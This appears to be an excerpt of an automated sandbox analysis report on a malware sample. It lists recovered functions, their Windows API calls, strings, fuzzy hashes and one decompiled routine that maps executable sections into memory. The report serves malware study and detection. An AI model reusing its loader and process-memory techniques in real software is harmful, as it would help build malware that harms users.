GetProcAddress.KERNEL32(6F57775A,00000318), ref: 001C71BF

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

Part of subcall function 001CB5B8: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 001CB5E1
Part of subcall function 001CB5B8: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,001C721C,00000000,00000000,00000028,00000100), ref: 001CB603

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 001C7345

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressProc$AllocateHeapMemory64ReadVirtualWow64
String ID:
API String ID: 2884978080-0
Opcode ID: cd68e5f7e599422732c2ea70e5fccf03f80c6ca163a11c7f7f0c19a7c66b206e
Instruction ID: 05449c79f1fe15ed2e1b4eff520efee243d7288b48f91da293ce80f7e005508e
Opcode Fuzzy Hash: cd68e5f7e599422732c2ea70e5fccf03f80c6ca163a11c7f7f0c19a7c66b206e
Instruction Fuzzy Hash: 6D612B71A0424AABDB14DFA5C981BAEBBB4FF28300F10416DED18E7291D770E950DFA0

Uniqueness

Uniqueness Score: 100.00%

Function 001D4438, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60UNIQUE

Download Yara Rule

APIs

memcpy.NTDLL(?,001E6258,00000018,001D4087,NTDLL.DLL,7250775A,001D4087,NTDLL.DLL,4772644C,001D4087,NTDLL.DLL,4C72644C,?,?,?,001D4087), ref: 001D44ED

Strings

NTDLL.DLL, xrefs: 001D4481, 001D44A5, 001D44C9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: NTDLL.DLL
API String ID: 3510742995-1613819793
Opcode ID: 8d0427a3288db5901fd685fb39fb549c8b1ad35b977945f1cc337f6c48676a07
Instruction ID: cab4acf4dab935e77d433fd6bc1a4756a2735a63ebcee301b124a164d80b2517
Opcode Fuzzy Hash: 8d0427a3288db5901fd685fb39fb549c8b1ad35b977945f1cc337f6c48676a07
Instruction Fuzzy Hash: AE1181716041C6EFCB20DF85EC86D6D3BA5F7A03A0784812AA6198F671EB316981CB61

Uniqueness

Uniqueness Score: 100.00%

Function 001C100B, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000), ref: 001C103B
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000), ref: 001C1082

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: cb2df03e722e8947c6dcaddbffb990f0b2d949deab226b7133cee638b9379301
Instruction ID: 614c8a9062484d50565c24be4b3105c5a6632bda951ba2508e5fae471567c3d2
Opcode Fuzzy Hash: cb2df03e722e8947c6dcaddbffb990f0b2d949deab226b7133cee638b9379301
Instruction Fuzzy Hash: 84118671900248FBCB11DBA8C844FAEB7B9EF62790F20405DF41097242DB75CE81CB50

Uniqueness

Uniqueness Score: 2.59%

Function 001D7879, Relevance: 3.1, APIs: 2, Instructions: 52memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(001C17A5,00000000,001C17A5,?,?), ref: 001D78AD
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,001C17A5,?,?), ref: 001D790E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 45b1e70425fac212b74cb8eaa2592b7c05fa7e93b2dd4672a5a037d994a78b04
Instruction ID: 9ad02f95deceb7512fa305c31b71b921a5b78e4d95a8de5daed4733d3b6eb44b
Opcode Fuzzy Hash: 45b1e70425fac212b74cb8eaa2592b7c05fa7e93b2dd4672a5a037d994a78b04
Instruction Fuzzy Hash: 4311E876D00149ABCF01DBE4DD85B9EB7BCAB28354F404066F501E6661DB34DA44DB61

Uniqueness

Uniqueness Score: 0.36%

Function 001D4B41, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C7B8F: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
Part of subcall function 001C7B8F: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
Part of subcall function 001C7B8F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
Part of subcall function 001C7B8F: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

HeapFree.KERNEL32(00000000,?,Ini,?,?,?,00000000,?,?,?,?,001CBD7D,?), ref: 001D4BAF

Part of subcall function 001C27A5: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,001D11A4,00000000,00000001,-00000007,?,00000000), ref: 001C27C8

Strings

Ini, xrefs: 001D4B51

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: Ini
API String ID: 1301464996-1327165576
Opcode ID: cfaacf0e29fab796bd7075b9d79a9be872ed186bb326ff947a72dd71192acffe
Instruction ID: 7b74af197b72c03dd6335670a8260f2699d1fc6d4afb0ca7aa62d329a2a8ffd6
Opcode Fuzzy Hash: cfaacf0e29fab796bd7075b9d79a9be872ed186bb326ff947a72dd71192acffe
Instruction Fuzzy Hash: 35012C75604204EFDB10EB89DCC2FAE77A9EB78354F104066FA40AB351E7B0ED409B51

Uniqueness

Uniqueness Score: 1.07%

Function 001C67D6, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48memoryUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C7B8F: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
Part of subcall function 001C7B8F: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
Part of subcall function 001C7B8F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
Part of subcall function 001C7B8F: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

HeapFree.KERNEL32(00000000,?,?,?,Kill,?,?), ref: 001C6844

Part of subcall function 001D427A: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,001C4B9D,00000000), ref: 001D428C
Part of subcall function 001D427A: StrChrA.SHLWAPI(?,?,?,?,00000000,001C4B9D,00000000), ref: 001D429B

Part of subcall function 001C6641: CloseHandle.KERNEL32(?), ref: 001C6667
Part of subcall function 001C6641: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001C6673
Part of subcall function 001C6641: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess), ref: 001C668A
Part of subcall function 001C6641: GetProcAddress.KERNEL32(00000000), ref: 001C6691
Part of subcall function 001C6641: Thread32First.KERNEL32(?,0000001C), ref: 001C66A1
Part of subcall function 001C6641: CloseHandle.KERNEL32(?), ref: 001C66E9

Strings

Kill, xrefs: 001C67E3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID: Kill
API String ID: 2627809124-2803628375
Opcode ID: f091d87f9a261058351f98c328fa0f5899c4b0897eca5c2b4d934447fe75716f
Instruction ID: 61f87928388fd154f080f5880e544e476d2fdaca9870a8d1308c4107b8435f5f
Opcode Fuzzy Hash: f091d87f9a261058351f98c328fa0f5899c4b0897eca5c2b4d934447fe75716f
Instruction Fuzzy Hash: C101A471600258FF9B01EBD5ECC5DAFBBBDDB24754700006AF802E2162D772DE40D660

Uniqueness

Uniqueness Score: 100.00%

Function 001D51F2, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C7B8F: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
Part of subcall function 001C7B8F: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
Part of subcall function 001C7B8F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
Part of subcall function 001C7B8F: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

HeapFree.KERNEL32(00000000,?,00000000,Scr,?,00000000,?,?,00000000,001C193F,001D7D1E,00000000,00000000), ref: 001D5268

Part of subcall function 001D427A: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,001C4B9D,00000000), ref: 001D428C
Part of subcall function 001D427A: StrChrA.SHLWAPI(?,?,?,?,00000000,001C4B9D,00000000), ref: 001D429B

Part of subcall function 001DD85D: lstrlen.KERNEL32(001DAF1C,00000000,779F5520,?,?,?,001DAF1C,00000126,00000000,779F551B,00000000), ref: 001DD88D
Part of subcall function 001DD85D: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001DD8A3
Part of subcall function 001DD85D: memcpy.NTDLL(00000010,001DAF1C,00000000,?,?,001DAF1C,00000126,00000000), ref: 001DD8D9
Part of subcall function 001DD85D: memcpy.NTDLL(00000010,00000000,00000126,?,?,001DAF1C,00000126), ref: 001DD8F4
Part of subcall function 001DD85D: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 001DD912
Part of subcall function 001DD85D: GetLastError.KERNEL32(?,?,001DAF1C,00000126), ref: 001DD91C
Part of subcall function 001DD85D: HeapFree.KERNEL32(00000000,00000000,?,?,001DAF1C,00000126), ref: 001DD942

Strings

Scr, xrefs: 001D51FF

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: Scr
API String ID: 730886825-1633706383
Opcode ID: 81f6bf1d554c7f1e1b42ce29e2421d970dce86965658c1ff2e7bc816141b2d17
Instruction ID: e98bf34f2d076bd9b4328b2dd418d95073dd3f66affab92c61ae07a8d36fe397
Opcode Fuzzy Hash: 81f6bf1d554c7f1e1b42ce29e2421d970dce86965658c1ff2e7bc816141b2d17
Instruction Fuzzy Hash: FF01A231600644FFDB119B90DC85F9E7BBDDB54B54F100016FA02A6694D7B0AE44D661

Uniqueness

Uniqueness Score: 100.00%

Function 001C4CD2, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(001E5FAC), ref: 001C4CE7

Part of subcall function 001DAFAE: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001DAFB9
Part of subcall function 001DAFAE: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 001DAFC8
Part of subcall function 001DAFAE: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 001DB05C
Part of subcall function 001DAFAE: GetModuleHandleA.KERNEL32(00000000), ref: 001DB067
Part of subcall function 001DAFAE: RtlExitUserThread.NTDLL(00000000), ref: 001DB078

InterlockedDecrement.KERNEL32(001E5FAC), ref: 001C4D0B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeapIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 4221646979-0
Opcode ID: 7dfe8721c7abb179319856607443e527f46c060b3bbe81f7c1fe019015b8317f
Instruction ID: 9e7d5e3217e45b6aa3f27ca99db818c091b632821b953c6190b5b89f57269422
Opcode Fuzzy Hash: 7dfe8721c7abb179319856607443e527f46c060b3bbe81f7c1fe019015b8317f
Instruction Fuzzy Hash: 3FE09A3224C662A7C7217FE48C28F7EA642AF70BA1F60445CFD83D5291D320CC40C292

Uniqueness

Uniqueness Score: 0.08%

Function 00410A5E, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00410A65
RtlEncodePointer.NTDLL(00000000), ref: 00410A6F

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: EncodePointer__calloc_crt
String ID:
API String ID: 2637449698-0
Opcode ID: 8469cd1f18e3b0e873edf3618d277ad0070cac487b6d556f5f2b89bdcf1cc8f2
Instruction ID: 20ea41624ba016da22feea8aaeca161031a203608e437193a83c602d972f3f69
Opcode Fuzzy Hash: 8469cd1f18e3b0e873edf3618d277ad0070cac487b6d556f5f2b89bdcf1cc8f2
Instruction Fuzzy Hash: 34E02B339883201FE3B09B647D05BD23BC0DB50732F11411BF508D62D2DE7448C14288

Uniqueness

Uniqueness Score: 0.04%

Function 001D55BD, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C93D9: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 001C9412
Part of subcall function 001C93D9: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 001C9448
Part of subcall function 001C93D9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 001C9454
Part of subcall function 001C93D9: lstrcmpi.KERNEL32(?,00000000), ref: 001C9491
Part of subcall function 001C93D9: StrChrA.SHLWAPI(?,0000002E), ref: 001C949A
Part of subcall function 001C93D9: lstrcmpi.KERNEL32(?,00000000), ref: 001C94AC
Part of subcall function 001C93D9: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 001C94FD

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,001E2668,0000002C,001D641E,NTDLL.DLL,6547775A,00000000,001D60C6), ref: 001D55FC

Part of subcall function 001CB5B8: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 001CB5E1
Part of subcall function 001CB5B8: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,001C721C,00000000,00000000,00000028,00000100), ref: 001CB603

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,001E2668,0000002C,001D641E,NTDLL.DLL,6547775A,00000000,001D60C6,?,00000318), ref: 001D5687

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: d547127308a525fcc86a522dc5b20b6c637281df0db02f125d47793f07f8886e
Instruction ID: 44e1ee886796337ff2382aaa63d7d5baf7e0b04bbd25c247539b9183cdf86d9c
Opcode Fuzzy Hash: d547127308a525fcc86a522dc5b20b6c637281df0db02f125d47793f07f8886e
Instruction Fuzzy Hash: F621C371D01629ABCF219FA5DC84ADEBBB5BF08720F14812AF914B6290D3749A41CFA4

Uniqueness

Uniqueness Score: 0.11%

Function 00401979, Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401979(void* __ecx, void* _a4, void* _a8) {
				signed int _v8;
				void* _t25;
				int _t33;
				signed int _t40;
				signed int _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t52;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t47 = _a8;
				_t25 =  *((intOrPtr*)(_t47 + 0x3c)) + _t47;
				_t40 =  *(_t25 + 6) & 0x0000ffff;
				_t49 =  *((intOrPtr*)(_t25 + 0x3c));
				_t52 = ( *(_t25 + 0x14) & 0x0000ffff) + _t25 + 0x18;
				_v8 = _t40;
				memcpy(_a4, _t47,  *(_t25 + 0x54)); // executed
				_t56 = _t55 + 0xc;
				if(_t40 > 0) {
					_t43 =  !(_t49 - 1);
					_t54 = _t52 + 0x14;
					do {
						_t33 =  *((intOrPtr*)(_t54 - 4)) + _t49 - 0x00000001 & _t43;
						if(_t33 != 0) {
							memcpy( *((intOrPtr*)(_t54 - 8)) + _a4,  *_t54 + _a8, _t33); // executed
							_t56 = _t56 + 0xc;
						}
						_t54 = _t54 + 0x28;
						_t21 =  &_v8;
						 *_t21 = _v8 - 1;
					} while ( *_t21 != 0);
				}
				E004012DE(_a4);
				return 0;
			}

0x0040197d
0x00401983
0x0040198a
0x00401990
0x00401993
0x004019a3
0x004019a6
0x004019ab
0x004019b0
0x004019b8
0x004019ba
0x004019c0
0x004019c7
0x004019c9
0x004019d9
0x004019de
0x004019de
0x004019e1
0x004019e4
0x004019e4
0x004019e4
0x004019c0
0x004019ec
0x004019f7

APIs

memcpy.NTDLL(00000002,00000000,?,00000000,?,?,?,?,004017EA,?,?,?,?,?,00000000,00000002), ref: 004019A6
memcpy.NTDLL(00000002,00000000,?,00000000,00000002,?,?), ref: 004019D9

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f53f580a27b0ea77e6c6fc53cf7afd9c60bf6c59f095d9dc3315f0c311ff895b
Instruction ID: e5c21bc7ae22eda552e83c118165bb3dd0074e79273933325db8ade71f95b6d8
Opcode Fuzzy Hash: f53f580a27b0ea77e6c6fc53cf7afd9c60bf6c59f095d9dc3315f0c311ff895b
Instruction Fuzzy Hash: 48115272500105AFCB10DF9AC981E9AB7F8EF04314B05406AF948AB352D239EA55D764

Uniqueness

Uniqueness Score: 0.03%

Function 001C0313, Relevance: 2.6, APIs: 1, Instructions: 1051UNIQUE

Download Yara Rule

APIs

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000), ref: 001C103B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 9e08219616d58b590e8d58236b1ac8ac0acadd9be9136ac97ad7da46f5906c74
Instruction ID: 38c1c318e91575786fe6898188b64b5c82de585ec1dd684c63088c408910a5a4
Opcode Fuzzy Hash: 9e08219616d58b590e8d58236b1ac8ac0acadd9be9136ac97ad7da46f5906c74
Instruction Fuzzy Hash: 0D019272A40184FFCB12DB688854BAEB7B5EFA2750F24445AF84087212E735CE91CB10

Uniqueness

Uniqueness Score: 100.00%

Function 001C9942, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441), ref: 001C9957

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ea2f3fe32c93c694f101e308da630cdb2c2a184082678089662807cba5c60cc5
Instruction ID: ad17375e9cc4edd8d385d788879f4950fe4cb3f8ef476ff3c825c11e82907e1a
Opcode Fuzzy Hash: ea2f3fe32c93c694f101e308da630cdb2c2a184082678089662807cba5c60cc5
Instruction Fuzzy Hash: 63219172A00558EFCB10DF99C8C5F9DB7B5FB64358B54406EE502AB241D730DE41CB50

Uniqueness

Uniqueness Score: 0.12%

Function 00413A97, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,004124DD,00000000,00000010,00000000,00000000,00000000,?,004119C6,00000001,00000214,?,0040F966), ref: 00413ADA

Part of subcall function 0041216E: __getptd_noexit.LIBCMT ref: 0041216E

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: a0c2b333c29670ddfbf600ada66f11381d20fdc57bfef4df074917e2e6c2c0f6
Instruction ID: cff410b8e770772b1e3e8f3623d980e4c6e81fea15c9267ffec95150240000bd
Opcode Fuzzy Hash: a0c2b333c29670ddfbf600ada66f11381d20fdc57bfef4df074917e2e6c2c0f6
Instruction Fuzzy Hash: 3A01F1313042159BEB24DF25DC14FEB3794AF817A2F04462BEC09CB290EB78ADC0C648

Uniqueness

Uniqueness Score: 0.00%

Function 001DB581, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 001DB5D3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 394c0ab3c0bbc731c79416bb3d4f4d764a2f0928faee9737765cedcdfb09c994
Instruction ID: aecc43c6f74f8fa9dc731fef50cc189f95c912240162eee3d562d29c4ab0c419
Opcode Fuzzy Hash: 394c0ab3c0bbc731c79416bb3d4f4d764a2f0928faee9737765cedcdfb09c994
Instruction Fuzzy Hash: E8111E3220420AAFDF019F99DC819DE7BAAFF18374B058125FE1996260C731DD21DF94

Uniqueness

Uniqueness Score: 0.16%

Function 00AB36FE, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 00AB3746

Memory Dump Source

Source File: 00000005.00000002.926412959.0000000000AB2000.00000040.00000001.sdmp, Offset: 00AB2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ab2000_CVPFktt.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 018db3d06f79a97e07a3664ddfcdaa606f23a3747fdc2bdf25cfe7d9c7875e50
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 98F062B31007106BDB206BB9988DBAAB6ECEF49724F100568E642914C1DF70ED894A61

Uniqueness

Uniqueness Score: 2.59%

Function 001D4D05, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 001D30E6: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,?,00000000,001D4D0C,?,001C7ACF,?), ref: 001D3105
Part of subcall function 001D30E6: PathFindFileNameW.SHLWAPI(00000000,001E60C4,?,00000000,00000800,00001000,?,00000000,001D4D0C,?,001C7ACF,?), ref: 001D3110
Part of subcall function 001D30E6: _wcsupr.NTDLL ref: 001D311D
Part of subcall function 001D30E6: lstrlenW.KERNEL32(00000000), ref: 001D3125

ResumeThread.KERNEL32(00000004,?,001C7ACF,?), ref: 001D4D1A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: abc78a2d6a315e89f99d40495e8179f6d86b96d0e2faa13f6bcede4212d251d4
Instruction ID: b3d8f5d486d7820f9639514c0dd62d2855af431e586bc4578633f91b40955ac5
Opcode Fuzzy Hash: abc78a2d6a315e89f99d40495e8179f6d86b96d0e2faa13f6bcede4212d251d4
Instruction Fuzzy Hash: 31D0A730208745A7DB251790CD09F0A7DE25F70B58F40C819FAC6602F4C33ACC50D505

Uniqueness

Uniqueness Score: 0.19%

Function 00410A8F, Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00410BAC: __lock.LIBCMT ref: 00410BAE

__onexit_nolock.LIBCMT ref: 00410AA7

Part of subcall function 004109A8: RtlDecodePointer.NTDLL(0041FAC0,004011AC,?,?,?,00410AAC,004102C1,0041C3F8,0000000C,00410AD8,004102C1,?,004102C1), ref: 004109BD
Part of subcall function 004109A8: RtlDecodePointer.NTDLL(?,?,?,00410AAC,004102C1,0041C3F8,0000000C,00410AD8,004102C1,?,004102C1), ref: 004109CA
Part of subcall function 004109A8: __realloc_crt.LIBCMT ref: 00410A07
Part of subcall function 004109A8: __realloc_crt.LIBCMT ref: 00410A1D
Part of subcall function 004109A8: RtlEncodePointer.NTDLL(004102C1,?,?,?,00410AAC,004102C1,0041C3F8,0000000C,00410AD8,004102C1,?,004102C1), ref: 00410A43
Part of subcall function 004109A8: RtlEncodePointer.NTDLL(-00000004,?,?,?,00410AAC,004102C1,0041C3F8,0000000C,00410AD8,004102C1,?,004102C1), ref: 00410A4B

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: Pointer$DecodeEncode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 2992712983-0
Opcode ID: 36a932dd18028038902941478ca1cd6ed66bbedf4df121e3acbac91c69f7b920
Instruction ID: 20cae92ec4b355ddeec8eec4f15c36055953d663409084e7b81be4e9d35ec91e
Opcode Fuzzy Hash: 36a932dd18028038902941478ca1cd6ed66bbedf4df121e3acbac91c69f7b920
Instruction Fuzzy Hash: E8D05B70841308E6DB00BFB5D8027CD76705F4035AF60810EB064690D2CABC15C14A0D

Uniqueness

Uniqueness Score: 0.02%

Function 00414C80, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(0084BCDC,008541BC,00000040,00000000,0041F614,00416992,?,?), ref: 00414C95

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6a58a5f6cb53dfca2f6d8941cdc5f328f5a07c8dcd42f70c39abca8f040a9038
Instruction ID: 1196a205f0a24f18bd199f212ba9dbd6a64b8c8b56508a0461ffb16dc866b711
Opcode Fuzzy Hash: 6a58a5f6cb53dfca2f6d8941cdc5f328f5a07c8dcd42f70c39abca8f040a9038
Instruction Fuzzy Hash: 11C08CFC100180AFD228CB00ECC4E6333BCF789302F10810DB50282290DF74E840CA24

Uniqueness

Uniqueness Score: 0.02%

Function 001E0789, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001E0796

Part of subcall function 001E08E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00022654,\l), ref: 001E0962

Memory Dump Source

